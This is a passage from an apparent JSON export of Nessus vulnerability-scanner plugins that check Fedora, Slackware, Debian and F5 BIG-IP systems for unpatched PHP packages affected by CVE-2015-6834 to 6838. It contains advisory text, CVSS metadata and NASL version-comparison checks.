WBMP). (cmb) * Fixed bug\n #70157 (parse_ini_string() segmentation fault with\n INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782\n (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260674\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260748\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166357.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a6eb2851\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"php-5.6.13-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:36", "description": "New php packages are available for Slackware 14.0, 14.1, and -current to fix security issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-10-02T00:00:00", "type": "nessus", "title": "Slackware 14.0 / 14.1 / current : php (SSA:2015-274-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:php", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2015-274-02.NASL", "href": "https://www.tenable.com/plugins/nessus/86223", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-274-02. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86223);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"SSA\", value:\"2015-274-02\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / current : php (SSA:2015-274-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.399477\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?933453e8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/02\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"php\", pkgver:\"5.4.45\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.4.45\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"php\", pkgver:\"5.4.45\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.4.45\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.6.13\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.13\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2021-08-19T12:44:25", "description": "Several vulnerabilities were found in PHP, a general-purpose scripting language commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream versions (5.4.45 and 5.6.13), which include additional bug fixes.\nPlease refer to the upstream changelog for more information :\n\n - https://php.net/ChangeLog-5.php#5.4.45\n - https://php.net/ChangeLog-5.php#5.6.13", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-14T00:00:00", "type": "nessus", "title": "Debian DSA-3358-1 : php5 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:php5", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3358.NASL", "href": "https://www.tenable.com/plugins/nessus/85914", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3358. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85914);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"DSA\", value:\"3358\");\n\n script_name(english:\"Debian DSA-3358-1 : php5 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes.\nPlease refer to the upstream changelog for more information :\n\n - https://php.net/ChangeLog-5.php#5.4.45\n - https://php.net/ChangeLog-5.php#5.6.13\"\n );\n # https://php.net/ChangeLog-5.php#5.4.45\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://secure.php.net/ChangeLog-5.php#5.4.45\"\n );\n # https://php.net/ChangeLog-5.php#5.6.13\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://secure.php.net/ChangeLog-5.php#5.6.13\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3358\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the oldstable 
distribution (wheezy), these problems have been\nfixed in version 5.4.45-0+deb7u1.\n\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 5.6.13+dfsg-0+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libphp5-embed\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php-pear\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cgi\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cli\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-common\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-curl\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dbg\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dev\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-enchant\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-fpm\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gd\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gmp\", 
reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-imap\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-interbase\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-intl\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-ldap\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mcrypt\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysql\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysqlnd\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-odbc\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pgsql\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pspell\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-recode\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-snmp\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sqlite\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sybase\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-tidy\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xmlrpc\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xsl\", reference:\"5.4.45-0+deb7u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-php5\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libphp5-embed\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif 
(deb_check(release:\"8.0\", prefix:\"php-pear\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-cgi\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-cli\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-common\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-curl\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-dbg\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-dev\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-enchant\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-fpm\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-gd\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-gmp\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-imap\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-interbase\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-intl\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-ldap\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mcrypt\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mysql\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mysqlnd\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-odbc\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif 
(deb_check(release:\"8.0\", prefix:\"php5-pgsql\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-phpdbg\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pspell\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-readline\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-recode\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-snmp\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-sqlite\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-sybase\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-tidy\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-xmlrpc\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-xsl\", reference:\"5.6.13+dfsg-0+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:26:58", "description": "Use after free vulnerability was found in unserialize() function. We can create ZVAL and free it via Serializable::unserialize. However the unserialize() will still allow to use R: or r: to set references to that already freed memory. 
A use-after-free attack is therefore possible, allowing arbitrary code to be executed remotely.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-02T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : PHP vulnerabilities (SOL17377)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2019-04-11T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL17377.NASL", "href": "https://www.tenable.com/plugins/nessus/91433", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL17377.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91433);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n\n script_name(english:\"F5 Networks BIG-IP : PHP vulnerabilities (SOL17377)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use after free vulnerability was found in 
unserialize() function. We\ncan create ZVAL and free it via Serializable::unserialize. However the\nunserialize() will still allow to use R: or r: to set references to\nthat already freed memory. It is possible to use-after-free attack and\nexecute arbitrary code remotely.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K17377\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL17377.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
